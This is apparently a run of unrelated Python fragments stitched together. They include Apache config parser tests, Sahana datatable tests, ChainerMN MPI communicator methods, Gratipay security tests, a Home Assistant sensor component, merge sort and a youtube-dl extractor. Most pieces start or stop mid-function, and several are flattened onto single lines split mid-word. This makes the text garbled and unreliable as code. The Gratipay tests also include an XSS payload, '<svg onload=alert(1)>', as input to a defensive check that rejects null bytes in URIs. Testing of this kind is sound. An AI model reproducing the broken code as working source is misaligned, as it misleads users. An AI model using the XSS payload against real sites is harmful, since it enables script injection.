            parser = ApacheParser(self.aug, path, "/dummy/vhostpath")

        self.assertEqual(parser.root, self.config_path)

    def test_root_absolute(self):
        from letsencrypt_apache.parser import ApacheParser

        with mock.patch("letsencrypt_apache.parser.ApacheParser."
                        "update_runtime_variables"):
            parser = ApacheParser(
                self.aug, os.path.relpath(self.config_path),
                "/dummy/vhostpath")

        self.assertEqual(parser.root, self.config_path)

    def test_root_no_trailing_slash(self):
        from letsencrypt_apache.parser import ApacheParser

        with mock.patch("letsencrypt_apache.parser.ApacheParser."
                        "update_runtime_variables"):
            parser = ApacheParser(
                self.aug, self.config_path + os.path.sep,
                "/dummy/vhostpath")

        self.assertEqual(parser.root, self.config_path)


if __name__ == "__main__":
    unittest.main()  # pragma: no cover
# =============================================================================
class S3ExtractLazyFKRepresentationTests(unittest.TestCase):
    """ Test lazy representation of foreign keys in datatables """

    tablename = "export_lazy_fk_represent"

    # -------------------------------------------------------------------------
    @classmethod
    def setUpClass(cls):
        # Define a scratch table with single-, multi- and list-reference
        # foreign keys to exercise the representation paths.
        db = current.db
        db.define_table(cls.tablename,
                        Field("location_id",
                              "reference gis_location"),
                        Field("organisation_id",
                              "reference org_organisation"),
                        Field("facility_type_id",
                              "list:reference org_facility_type"),
                        *s3_meta_fields())

    # -------------------------------------------------------------------------
    def setUp(self):

        tablename = self.tablename
        s3db = current.s3db
        table = s3db[tablename]

        # Register the scratch table as a component of org_organisation
        # so it can be selected as "test.<field>".
        s3db.add_components("org_organisation",
                            **{tablename: {"name": "test",
                                           "joinby": "organisation_id",
                                           },
                               }
                            )

        current.auth.override = True

        # Create locations
        locations = (Storage(name="FK Represent TestLocation 1"),
                     Storage(name="FK Represent TestLocation 2"))
        ltable = s3db.gis_location
        for i in xrange(len(locations)):
            location = locations[i]
            location_id = ltable.insert(**location)
            location["id"] = location_id
        self.locations = locations

        # Create facility types
        fac_types = (Storage(name="FK Represent TestFacType P"),
                     Storage(name="FK Represent TestFacType Q"),
                     Storage(name="FK Represent TestFacType R"))
        ttable = s3db.org_facility_type
        for i in xrange(len(fac_types)):
            fac_type = fac_types[i]
            fac_type_id = ttable.insert(**fac_type)
            fac_type["id"] = fac_type_id
        self.fac_types = fac_types

        # Create organisation
        org = Storage(name="FK Represent TestOrg A")
        otable = s3db.org_organisation
        org_id = otable.insert(**org)
        org["id"] = org_id
        s3db.update_super(otable, org)
        self.org = org

        # Create test records
        facs = (Storage(organisation_id=org.id,
                        facility_type_id=[fac_types[0].id, fac_types[1].id],
                        location_id=locations[0].id),
                Storage(organisation_id=org.id,
                        facility_type_id=[fac_types[1].id, fac_types[2].id],
                        location_id=locations[1].id))
        for i in xrange(len(facs)):
            fac = facs[i]
            fac_id = table.insert(**fac)
            fac["id"] = fac_id
        self.facs = facs

    # -------------------------------------------------------------------------
    def testRepresentReferenceSingleNoLinkto(self):
        """ Test Representation of reference, single value, without linkto """

        s3db = current.s3db

        tablename = self.tablename
        fname = "%s.organisation_id" % tablename
        fac = self.facs[0]
        resource = s3db.resource(tablename, id=fac.id)

        renderer = S3Represent(lookup="org_organisation")
        table = resource.table
        table.organisation_id.represent = renderer

        data = resource.select(["id", "organisation_id"],
                               limit=None,
                               represent=True)
        result = data["rows"]

        # All lookups for a column should be resolved with one query.
        self.assertEqual(renderer.queries, 1)

        self.assertTrue(isinstance(result, list))
        self.assertEqual(len(result), 1)
        output = result[0]
        self.assertTrue(isinstance(output, Storage))
        self.assertTrue(fname in output)
        self.assertEqual(output[fname], self.org.name)

    # -------------------------------------------------------------------------
    def testRepresentReferenceSingleLinktoOn(self):
        """ Test Representation of reference, single value, with linkto """

        s3db = current.s3db

        tablename = self.tablename
        fname = "%s.organisation_id" % tablename
        fac = self.facs[0]
        resource = s3db.resource(tablename, id=fac.id)

        renderer = S3Represent(lookup="org_organisation",
                               #linkto=URL(c="org", f="organisation", args=["[id]"]),
                               show_link=True)
        table = resource.table
        table.organisation_id.represent = renderer

        data = resource.select(["id", "organisation_id"],
                               limit=None,
                               represent=True)
        result = data["rows"]

        self.assertEqual(renderer.queries, 1)

        self.assertTrue(isinstance(result, list))
        self.assertEqual(len(result), 1)
        output = result[0]
        self.assertTrue(isinstance(output, Storage))
        self.assertTrue(fname in output)
        representation = output[fname]
        # With show_link the value is rendered as an anchor element.
        self.assertTrue(isinstance(representation, A))
        self.assertEqual(representation.attributes["_href"],
                         "/%s/org/organisation/%s" %
                         (current.request.application, self.org.id))
        self.assertEqual(representation.components[0],
                         self.org.name)

    # -------------------------------------------------------------------------
    def testRepresentReferenceSingleLinktoOff(self):
        """ Test Representation of reference, single value, with linkto + show_link=False """

        s3db = current.s3db

        tablename = self.tablename
        fname = "%s.organisation_id" % tablename
        fac = self.facs[0]
        resource = s3db.resource(tablename, id=fac.id)

        renderer = S3Represent(lookup="org_organisation",
                               linkto=URL(c="org", f="organisation", args=["[id]"]))
        table = resource.table
        table.organisation_id.represent = renderer

        # show_links=False must suppress the anchor despite the linkto.
        data = resource.select(["id", "organisation_id"],
                               limit=None,
                               represent=True,
                               show_links=False)
        result = data["rows"]

        self.assertEqual(renderer.queries, 1)

        self.assertTrue(isinstance(result, list))
        self.assertEqual(len(result), 1)
        output = result[0]
        self.assertTrue(isinstance(output, Storage))
        self.assertTrue(fname in output)
        self.assertEqual(output[fname], self.org.name)

    # -------------------------------------------------------------------------
    def testRepresentReferenceMultipleNoLinkto(self):
        """ Test Representation of reference, multiple values, without linkto """

        s3db = current.s3db

        tablename = self.tablename
        fname = "%s.location_id" % tablename

        ftable = current.db[tablename]
        renderer = S3Represent(lookup="gis_location")
        ftable.location_id.represent = renderer

        resource = s3db.resource("org_organisation", id=self.org.id)
        data = resource.select(["id", "test.location_id"],
                               limit=None,
                               represent=True)
        result = data["rows"]

        self.assertEqual(renderer.queries, 1)

        # NOTE(review): assertTrue(len(result), 1) only checks truthiness of
        # len(result) — assertEqual was probably intended here.
        self.assertTrue(len(result), 1)
        output = result[0]
        self.assertTrue(fname in output)
        names = output[fname].split(", ")
        self.assertEqual(len(names), 2)
        self.assertTrue(self.locations[0].name in names)
        self.assertTrue(self.locations[1].name in names)

    # -------------------------------------------------------------------------
    def testRepresentReferenceMultipleLinktoOn(self):
        """ Test Representation of reference, multiple values, with link
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals from argparse import ArgumentParser from .core import Core def getopt(argv): parser = ArgumentParser(description='Another webui for youtube-dl') parser.add_argument('-c', '--config', metavar="CONFIG_FILE", h
elp="config file") parser.add_argum
ent('--host', metavar="ADDR", help="the address server listens on") parser.add_argument('--port', metavar="PORT", help="the port server listens on") return vars(parser.parse_args()) def main(argv=None): from os import getpid print("pid is {}".format(getpid())) print("-----------------------------------") cmd_args = getopt(argv) core = Core(cmd_args=cmd_args) core.start()
                 (rlens, _cnt_to_dsp(rlens)),
                 _get_mpi_type(msgtype)],
                root)
            ys = [rbuf[i:i + l].reshape(s)
                  for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
            return tuple(ys)

        else:
            sbuf = _memory_utility.array_to_buffer_object(
                x, _get_mpi_type(msgtype))
            self.mpi_comm.Gatherv(sbuf, None, root)
            return None

    def allgather(self, x):
        """Gather an array from every process and deliver the full set to all.

        Uses MPI Allgatherv under the hood; tuple inputs are rejected and
        every process must send exactly one array.
        """
        chainer.utils.experimental(
            'chainermn.communicators.MpiCommunicatorBase.allgather')

        msgtype = _MessageType(x)
        _check_dtype('allgather', msgtype)

        msgtypes = self.mpi_comm.allgather(msgtype)
        _check_dtypes_are_same(msgtypes)

        # Type check.
        for msgtype in msgtypes:
            if msgtype.is_tuple:
                raise TypeError('allgather cannot handle tuple data')

            assert len(msgtype.shapes) == 1

        # Collective communication.
        xp = chainer.backend.get_array_module(x)
        shapes = [msgtype.shapes[0] for msgtype in msgtypes]
        sbuf = _memory_utility.array_to_buffer_object(
            x, _get_mpi_type(msgtype))
        rlens = [chainer.utils.size_of_shape(s) for s in shapes]
        rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
        if xp is not numpy:
            # Ensure pending device work is finished before MPI touches
            # the device buffers.
            chainer.cuda.Stream.null.synchronize()
        self.mpi_comm.Allgatherv(
            sbuf,
            [_memory_utility.get_device_memory_pointer(rbuf),
             (rlens, _cnt_to_dsp(rlens)),
             _get_mpi_type(msgtype)])
        ys = [rbuf[i:i + l].reshape(s)
              for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]

        return tuple(ys)

    def allreduce(self, x):
        """A primitive of inter-process allreduce communication.

        This method tries to invoke allreduce communication within the
        communicator. All processes in the communicator are expected to
        invoke ``allreduce()``. This method relies on mpi4py fast
        communication optimized for numpy arrays, as well as ``send()`` and
        ``recv()``.

        Note that this method can only handle the same shapes of data
        over all processes, and cannot handle tuple data.

        If ``x`` is numpy array, the received data will also be allocated
        as numpy array. Additionally, when ``x`` is cupy array, the returned
        array will be placed at current device
        (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
        regardless of which device the argument is placed at remote nodes.

        Args:
            x (numpy/cupy array): An array to apply allreduce operation.

        Returns:
            ys (numpy/cupy array): An array that allreduce (currently SUM
                only) has been applied.

        """

        msgtype = _MessageType(x)
        _check_dtype('allreduce', msgtype)

        if msgtype.is_tuple:
            raise TypeError('allreduce cannot handle tuple data')

        xp = chainer.backend.get_array_module(x)

        # TODO(kuenishi): do we check all messages have same shape and dims?

        # Source buffer
        sbuf = _memory_utility.array_to_buffer_object(
            x, _get_mpi_type(msgtype))
        # Destination buffer and its object
        shape = msgtype.shapes[0]
        dbuf = xp.empty(
            [chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
        dbuf_buffer_obj = _memory_utility.array_to_buffer_object(
            dbuf, _get_mpi_type(msgtype))
        self.mpi_comm.Allreduce(sbuf, dbuf_buffer_obj)

        return dbuf.reshape(shape)

    def scatter(self, xs, root=0):
        """A primitive of inter-process scatter communication.

        This method tries to invoke scatter communication within the
        communicator. All processes in the communicator are expected to
        invoke ``scatter()``. This method relies on mpi4py fast communication
        optimized for numpy arrays, as well as ``send()`` and ``recv()``.

        If ``xs`` is tuple, each element is send to different processes.
        The length of the tuple must be the same as the communicator size.
        If ``xs`` is ``numpy.ndarrray``, it is splitted with the first
        axis and sent to different processes. For slave processes, ``xs``
        is allowed to be any value (will be ignored).

        If ``scatter()`` is invoked with cupy array in the root process,
        the returned array will be placed at current device
        (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
        regardless of which device the argument is placed at remote nodes.

        Args:
            xs (tuple of numpy/cupy array): Arrays to be scattered.
            root (int): Rank of root process.

        Returns:
            ys (numpy/cupy array): Received arrays.
        """
        chainer.utils.experimental(
            'chainermn.communicators.CommunicatorBase.scatter')

        is_master = self.mpi_comm.rank == root

        if is_master:
            # Type check.
            msgtype = _MessageType(xs)
            _check_dtype('scatter', msgtype)

            if msgtype.is_tuple:
                if len(msgtype.shapes) != self.size:
                    raise ValueError(
                        'the length of xs must be consistent '
                        'with communicator size')

                xp = chainer.backend.get_array_module(*xs)
                msgtype = tuple([_MessageType(x) for x in xs])
                shapes = [mty.shapes[0] for mty in msgtype]
                # concatenate([x.reshape(-1) ... ], axis=0) will fail
                xs = xp.concatenate(
                    [x.reshape(1, -1) for x in xs], axis=1)

            else:
                assert len(msgtype.shapes) == 1

                if msgtype.shapes[0][0] != self.mpi_comm.size:
                    raise ValueError(
                        'scatter received inconsistent number of inputs '
                        'with communicator size')

                xp = chainer.backend.get_array_module(xs)
                msgtype = tuple([_MessageType(xs[0])
                                 for _ in range(self.size)])
                shapes = [xs.shape[1:] for _ in range(self.size)]

            msgtype = self.mpi_comm.scatter(msgtype, root)
            shape = msgtype.shapes[0]

            # Collective communication.
            slens = [chainer.utils.size_of_shape(s) for s in shapes]
            sbuf = _memory_utility.get_device_memory_pointer(xs)
            rbuf = xp.empty(
                [chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
            rtype = _get_mpi_type(msgtype)
            if xp is not numpy:
                # Finish pending device work before MPI reads the buffers.
                chainer.cuda.Stream.null.synchronize()
            self.mpi_comm.Scatterv(
                [sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(msgtype)],
                _memory_utility.array_to_buffer_object(rbuf, rtype),
                root)

            return rbuf.reshape(shape)

        else:  # slave processes
            msgtypes = self.mpi_comm.scatter(None, root)
            xp = msgtypes.get_array_module()
            shape = msgtypes.shapes[0]
            rbuf = xp.empty(
                [chainer.utils.size_of_shape(shape)], dtype=msgtypes.dtype)
            rtype = _get_mpi_type(msgtypes)
            self.mpi_comm.Scatterv(
                None,
                _memory_utility.array_to_buffer_object(rbuf, rtype),
                root)

            return rbuf.reshape(shape)

    # Objects

    def send_obj(self, obj, dest, tag=0):
        # Pickle-based point-to-point send (mpi4py lowercase API).
        self.mpi_comm.send(obj, dest=dest, tag=tag)

    def recv_obj(self, source, status=None, tag=mpi4py.MPI.ANY_TAG):
        # Pickle-based point-to-point receive.
        return self.mpi_comm.recv(source=source, status=status, tag=tag)

    def bcast_obj(self, obj, max_buf_len=256 * 1024 * 1024, root=0):
        # Broadcast an arbitrary object, chunked to bound buffer size.
        return chunked_bcast_obj(obj, self.mpi_comm,
                                 max_buf_len=max_buf_len,
                                 root=root)

    def gather_obj(self, obj, root=0):
        return self.mpi_comm.gather(obj, root=root)

    def allreduce_obj(self, obj):
        # Summation by default
        return self.mpi_comm.allreduce(obj)

    def bcast
"""Tests for gratipay's request/response security machinery.

Covers four areas: null-byte rejection in URIs, HTTP method whitelisting,
security response headers, and the Fernet-based ``EncryptingPacker``.
Python 2 module (uses the ``buffer`` builtin in the last test).
"""
from __future__ import absolute_import, division, print_function, unicode_literals

import struct
import datetime

from aspen import Response
from aspen.http.request import Request
from base64 import urlsafe_b64decode
from cryptography.fernet import Fernet, InvalidToken
from gratipay import security
from gratipay.models.participant import Identity
from gratipay.security.crypto import EncryptingPacker
from gratipay.testing import Harness
from pytest import raises


class RejectNullBytesInURI(Harness):
    """Requests whose path or querystring contains %00 must get a 400."""

    def test_filters_path(self):
        assert self.client.GxT('/f%00/').code == 400

    def test_filters_querystring(self):
        assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400

    def test_protects_against_reflected_xss(self):
        self.make_package()
        assert self.client.GET('/on/npm/foo').code == 200
        # %00 is rejected outright (400); other control chars just miss (404).
        assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400
        assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404  # fyi


class OnlyAllowCertainMethodsTests(Harness):
    """Only GET/HEAD/POST are allowed; matching is case-insensitive."""

    def test_is_installed_properly(self):
        assert self.client.hxt('TRaCE', '/').code == 405

    def test_allows_certain_methods(self):
        # Mixed case on purpose: the check is case-insensitive.
        for allowed in ('GEt', 'HEaD', 'PosT'):
            request = Request(allowed)
            assert security.only_allow_certain_methods(request) is None

    def test_disallows_a_bunch_of_other_stuff(self):
        for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'):
            request = Request(disallowed)
            # raises(...).value exposes the Response the filter raised.
            response = raises(Response, security.only_allow_certain_methods, request).value
            assert response.code == 405

    def test_doesnt_choke_error_handling(self):
        assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405

    def test_prevents_csrf_from_choking(self):
        assert self.client.PxST('/assets/gratipay.css').code == 405


class AddHeadersToResponseTests(Harness):
    """Every response carries the standard hardening headers."""

    def test_sets_x_frame_options(self):
        headers = self.client.GET('/about/').headers
        assert headers['X-Frame-Options'] == 'SAMEORIGIN'

    def test_sets_x_content_type_options(self):
        headers = self.client.GET('/about/').headers
        assert headers['X-Content-Type-Options'] == 'nosniff'

    def test_sets_x_xss_protection(self):
        headers = self.client.GET('/about/').headers
        assert headers['X-XSS-Protection'] == '1; mode=block'

    def test_sets_referrer_policy(self):
        headers = self.client.GET('/about/').headers
        assert headers['Referrer-Policy'] == \
            'no-referrer-when-downgrade, strict-origin-when-cross-origin'

    def test_sets_strict_transport_security(self):
        headers = self.client.GET('/about/').headers
        assert headers['strict-transport-security'] == 'max-age=31536000'

    def test_doesnt_set_content_security_policy_by_default(self):
        # CSP is opt-in via the CSP_REPORT_URI env var, and report-only.
        assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers

    def test_sets_content_security_policy(self):
        with self.setenv(CSP_REPORT_URI='http://cheese/'):
            headers = self.client.GET('/about/').headers
        policy = (
            "default-src 'self';"
            "script-src 'self' assets.gratipay.com 'unsafe-inline';"
            "style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com"
            " 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';"
            "img-src *;"
            "font-src 'self' assets.gratipay.com cloud.typography.com data:;"
            "block-all-mixed-content;"
            "report-uri http://cheese/;"
        )
        assert headers['content-security-policy-report-only'] == policy


class EncryptingPackerTests(Harness):
    """Round-trip and key-rotation behavior of Identity's Fernet packer."""

    # A fixed Fernet token produced with the test key; used to pin format details.
    packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\
             b'5TdyoJsll5nMAicg=='

    def test_packs_encryptingly(self):
        packed = Identity.encrypting_packer.pack({"foo": "bar"})
        assert urlsafe_b64decode(packed)[0] == b'\x80'  # Fernet version

    def test_unpacks_decryptingly(self):
        assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"}

    def test_fails_to_unpack_old_data_with_a_new_key(self):
        encrypting_packer = EncryptingPacker(Fernet.generate_key())
        raises(InvalidToken, encrypting_packer.unpack, self.packed)

    def test_can_unpack_if_old_key_is_provided(self):
        # Extra keys passed to EncryptingPacker act as legacy decrypt keys.
        old_key = str(self.client.website.env.crypto_keys)
        encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key)
        assert encrypting_packer.unpack(self.packed) == {"foo": "bar"}

    def test_leaks_timestamp_derp(self):
        # Fernet stores the creation time in cleartext:
        # https://github.com/pyca/cryptography/issues/2714
        timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9])  # unencrypted!
        assert datetime.datetime.fromtimestamp(timestamp).year == 2016

    def test_demands_bytes(self):
        # NOTE: ``buffer`` is a Python 2 builtin; this file predates Python 3.
        raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer'))
        raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
# -*- coding: utf-8 -*-
"""URL routes for the app's public pages: home, misc, leaderboard, login."""
from __future__ import unicode_literals

# NOTE(review): ``render`` is not used in this module — confirm before removing.
from django.shortcuts import render
from django.conf.urls import url

# NOTE(review): Sign_upView is non-PEP8 (would be SignUpView); defined in .views.
from .views import HomePageView, LeaderboardView, MiscView, Sign_upView

urlpatterns = [
    url(r'^$', HomePageView.as_view(), name='home'),
    url(r'^misc$', MiscView.as_view(), name='misc'),
    url(r'^leaderboard$', LeaderboardView.as_view(), name='leaderboard'),
    # The 'login' route is served by the sign-up view.
    url(r'^login$', Sign_upView.as_view(), name='login'),
]
# -*- coding: utf-8 -*-
"""Tests for pytak: placeholder randomization, request-body templating,
URI rewriting via ``+``, and body replacement via ``<<``.

Relies on the fakeapi test doubles (CreateTag, CreateAPost, ...).
"""
from __future__ import print_function

import pytak.call as call
import pytak.runners.tools as tools

from fakeapi import CreateTag
from fakeapi import GetInformationAboutYourself
from fakeapi import CreateAPost

# Template body: [XXXXX]/[DDDD] are placeholders pytak substitutes with
# random alphanumerics/digits (see test_randomize_text below).
new_request_body = {
    "title": "New Employee [XXXXX]",
    "body": "Please welcome our new employee. Pytak tag - [DDDD]",
    "type": "TEXT",
    "permissions": {
        "principal": {
            "id": "12345",
            "resource": "http://example.com/schema/1.0/user"
        },
        "permissionFlags": {
            "view": "true",
            "edit": "false",
            "comment": "true",
            "share": "true",
            "authorize": "false"
        }
    },
    "tags": [{"name": "tag2"}, {"name": "tag3"}, {"name": "tag4"}]
}


def test_randomize_text():
    # Placeholders must be replaced, so the result differs from the input.
    txt = "JSON value with [XXXX] and [DDDD]"
    assert txt != call.randomize_text(txt)


# NOTE(review): "leght" is a typo for "length" in the two test names below;
# left as-is because renaming changes the collected test IDs.
def test_random_int_leght():
    # Double-underscore module attribute: no name mangling at function scope.
    dig = call.__get_random_int(4)
    assert len(str(dig)) == 4


def test_random_alphanum_leght():
    alphnum = call.__get_random_alphanumeric(4)
    assert len(alphnum) == 4


def test_api_object_request_body_creation():
    # ``assign`` alone must not touch the request body until form_request_body.
    ct = CreateTag()
    ct2 = CreateTag(assign={'name': 'first'})
    assert ct.request_body == ct2.request_body


def test_api_object_request_body_manipulation_with_empty():
    ct = CreateTag()
    ct2 = CreateTag(assign={'name': 'second'})
    tools.form_request_body(ct2)
    assert ct.request_body != ct2.request_body


def test_api_object_request_body_manipulation_with_change():
    ct = CreateTag(assign={'name': 'one'})
    ct2 = CreateTag(assign={'name': 'two'})
    tools.form_request_body(ct2)
    assert ct.request_body != ct2.request_body


def test_url_rewrite():
    # ``+`` appends a query string to the endpoint's URI.
    your_information = GetInformationAboutYourself() + "fields=id,screenName,fullName"
    assert your_information.uri == "/api/muad/rest/users/@me?fields=id,screenName,fullName"


def test_request_body_rewrite():
    # Smoke test: ``<<`` must accept a dict body without raising.
    CreateAPost() << new_request_body


def test_assign_randomization():
    # ``assign`` values containing placeholders are randomized on construction.
    create_tag = CreateTag(assign={"name": "pytak-[XXXX]"})
    assert create_tag.assign != {"name": "pytak-[XXXX]"}


def test_request_body_randomization():
    create_post = CreateAPost() << new_request_body
    print(create_post.request_body)
class Solution(object): def containsNearbyAlmostDuplicate(self, nums, k, t): """ :type nums: List[int] :type k: int :type t: int :rtype: bool """ if k < 1 or t < 0: return False dic = {} t += 1 for i in range(len(nums)): if i > k: del dic[nums[i - k - 1] // t] m = nums[i] // t if m in dic: return True if m - 1 in dic and abs
(nums[i] - dic[m - 1]) < t: return True if m + 1 in dic and abs(nums[i] - dic[m + 1]) < t: return True dic[m] = nums[i] return False test = Solution() print(test.containsNearbyAlmostDupl
icate([1, 3, 1], 1, 1))
ON_TITLE = "Wireless Sensor Tag Setup" DOMAIN = "wirelesstag" DEFAULT_ENTITY_NAMESPACE = "wirelesstag" # Template for signal - first parameter is tag_id, # second, tag manager mac address SIGNAL_TAG_UPDATE = "wirelesstag.tag_info_updated_{}_{}" # Template for signal - tag_id, sensor type and # tag manager mac address SIGNAL_BINARY_EVENT_UPDATE = "wirelesstag.binary_event_updated_{}_{}_{}" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string, } ) }, extra=vol.ALLOW_EXTRA, ) class WirelessTagPlatform: """Principal object to manage all registered in HA tags.""" def __init__(self, hass, api): """Designated initializer for wirelesstags platform.""" self.hass = hass self.api = api self.tags = {} self._local_base_url = None @property def tag_manager_macs(self): """Return list of tag managers mac addresses in user account.""" return self.api.mac_addresses def load_tags(self): """Load tags from remote server.""" self.tags = self.api.load_tags() return self.tags def arm(self, switch): """Arm entity sensor monitoring.""" func_name = f"arm_{switch.sensor_type}" arm_func = getattr(self.api, func_name) if arm_func is not None: arm_func(switch.tag_id, switch.tag_manager_mac) def disarm(self, switch): """Disarm entity sensor monitoring.""" func_name = f"disarm_{switch.sensor_type}" disarm_func = getattr(self.api, func_name) if disarm_func is not None: disarm_func(switch.tag_id, switch.tag_manager_mac) def make_notifications(self, binary_sensors, mac): """Create configurations for push notifications.""" _LOGGER.info("Creating configurations for push notifications.") configs = [] bi_url = self.binary_event_callback_url for bi_sensor in binary_sensors: configs.extend(bi_sensor.event.build_notifications(bi_url, mac)) update_url = self.update_callback_url update_config = NC.make_config_for_update_event(update_url, mac) configs.append(update_config) return configs def install_push_notifications(self, 
binary_sensors): """Register local push notification from tag manager.""" _LOGGER.info("Registering local push notifications.") for mac in self.tag_manager_macs: configs = self.make_notifications(binary_sensors, mac) # install notifications for all tags in tag manager # specified by mac result = self.api.install_push_notification(0, configs, True, mac) if not result: self.hass.components.persistent_notification.create( "Error: failed to install local push notifications <br />", title="Wireless Sensor Tag Setup Local Push Notifications", notification_id="wirelesstag_failed_push_notification", ) else: _LOGGER.info( "Installed push notifications for all\ tags in %s.", mac, ) @property def local_base_url(self): """Define base url of hass in local network.""" if self._local_base_url is None: self._local_base_url = "http://{}".format(util.get_local_ip()) port = self.hass.config.api.port if port is not None: self._local_base_url += f":{port}" return self._local_base_url @property def update_callback_url(self): """Return url for local push notifications(update event).""" return f"{self.local_base_url}/api/events/wirelesstag_update_tags" @property def binary_event_callback_url(self): """Return url for local push notifications(binary event).""" return f"{self.local_base_url}/api/events/wirelesstag_binary_event" def handle_update_tags_event(self, event): """Handle push event from wireless tag manager.""" _LOGGER.info("push notification for update arrived: %s", event) try: tag_id = event.data.get("id") mac = event.data.get("mac") dispatcher_send(self.hass, SIGNAL_TAG_UPDATE.format(tag_id, mac), event) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag update event:\ %s error: %s", str(event), str(ex), ) def handle_binary_event(self, event): """Handle push notifications for binary (on/off) events.""" _LOGGER.info("Push notification for binary event arrived: %s", event) try: tag_id = event.data.get("id") event_type = 
event.data.get("type") mac = event.data.get("mac") dispatcher_send( self.hass, SIGNAL_BINARY_EVENT_UPDATE.format(tag_id, event_type, mac), event, ) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag binary event:\ %s error: %s", str(event), str(ex), ) def setup(hass, config): """Set up the Wireless Sensor Tag component.""" conf = config[DOMAIN] username = conf.get(CONF_USERNAME) password = conf.get(CONF_PASSWORD) try: from wirelesstagpy import WirelessTags, WirelessTagsException wirelesstags = WirelessTags(username=username, password=password) platform = WirelessTagPlatform(hass, wirelesstags) platform.load_tags() hass.data[DOMAIN] = platform except (ConnectTimeout, HTTPError, WirelessTagsException) as ex: _LOGGER.error("Unable to connect to wirelesstag.net service: %s", str(ex)) hass.components.persistent_notification.create( "Error: {}<br />" "Please restart hass after fixing this." "".format(ex), title=NOTIFICATION_TITLE, notification_id=NOTIFICATION_ID, ) return False # listen to custom events hass.bus.listen( "wirelesstag_update_tags", hass.data[DOMAIN].handle_update_tags_event
) hass.bus.listen("wirelesstag_binary_event", hass.data[DOMAIN].handle_binary_event) return True class WirelessTagBaseSensor(Entity): """Base class for HA implementation for Wireless Sensor Tag.""" def __init__(self, api, tag): """Initialize a base sensor for Wireless Sensor Tag platform.""" self._api = api self._tag = tag self._uuid = self._tag.uuid self.tag_id = self._tag.tag_id self.ta
g_manager_mac = self._tag.tag_manager_mac self._name = self._tag.name self._state = None @property def should_poll(self): """Return the polling state.""" return True @property def name(self): """Return the name of the sensor.""" return self._name @property def principal_value(self): """Return base value. Subclasses need override based on type of sensor. """ return 0 def updated_state_value(self): """Return formatted value. The default implementation formats principal value. """ return self.decorate_value(self.principal_value) # pylint: disable=no-self-use def decorate_value(self, value): """Decorate input value to be well presented for end user.""" return f"{value:.1f}" @property def available(self): """Return True if entity is available.""" return self._tag.is_alive def update(self): """Update state.""" if not self.should_poll: return updated_tags = self._api.load_tags() updated_tag = updated_tags[self._uuid] if updated_tag is None: _LOGGER.er
'''
Python program for implementation of Merge Sort.

merge(arr, l, m, r) merges the adjacent sorted runs arr[l..m] and
arr[m+1..r] in place; mergeSort(arr, l, r) sorts arr[l..r] (both
indices inclusive) by recursive halving.
'''


def merge(arr, l, m, r):
    """Merge the sorted runs arr[l..m] and arr[m+1..r] back into arr[l..r].

    Stable: on equal keys the element from the left run is taken first.
    """
    n1 = m - l + 1  # length of the left run
    n2 = r - m      # length of the right run

    # Create temporary arrays and copy the two runs into them.
    L = [0] * n1
    R = [0] * n2
    for i in range(0, n1):
        L[i] = arr[l + i]
    for j in range(0, n2):
        R[j] = arr[m + 1 + j]

    # Merge the temp arrays back into arr[l..r].
    i = 0  # index into L
    j = 0  # index into R
    k = l  # index into the merged region of arr
    while i < n1 and j < n2:
        if L[i] <= R[j]:  # <= keeps the sort stable
            arr[k] = L[i]
            i += 1
        else:
            arr[k] = R[j]
            j += 1
        k += 1

    # Copy any remaining elements of L[].
    while i < n1:
        arr[k] = L[i]
        i += 1
        k += 1

    # Copy any remaining elements of R[].
    # BUGFIX: was ``arr[k] R[j]`` (missing ``=``), a syntax error that made
    # the tail of the right run vanish from the merge.
    while j < n2:
        arr[k] = R[j]
        j += 1
        k += 1


def mergeSort(arr, l, r):
    """Sort arr[l..r] (inclusive) in place with merge sort.

    l is the left index and r the right index of the subarray to sort.
    """
    if l < r:
        # Same as (l+r)//2, but avoids overflow for large l and r in
        # languages with fixed-width ints.
        # BUGFIX: use floor division; ``/`` produces a float index on Python 3.
        m = (l + (r - 1)) // 2

        # Sort the two halves, then merge them.
        mergeSort(arr, l, m)
        mergeSort(arr, m + 1, r)
        merge(arr, l, m, r)
# coding: utf-8
"""youtube-dl extractor for Disney/ABC go.com properties.

Resolves a video either from a ``vdka<id>`` URL component or by scraping
the page for a data-video-id attribute, then pulls formats, subtitles and
thumbnails from the watchabc content API. Protected streams go through
Adobe Pass entitlement (via the AdobePassIE base class).
"""
from __future__ import unicode_literals

import re

from .adobepass import AdobePassIE
from ..utils import (
    int_or_none,
    determine_ext,
    parse_age_limit,
    urlencode_postdata,
    ExtractorError,
)


class GoIE(AdobePassIE):
    # Per-subdomain API brand code and Adobe Pass requestor id.
    _SITE_INFO = {
        'abc': {
            'brand': '001',
            'requestor_id': 'ABC',
        },
        'freeform': {
            'brand': '002',
            'requestor_id': 'ABCFamily',
        },
        'watchdisneychannel': {
            'brand': '004',
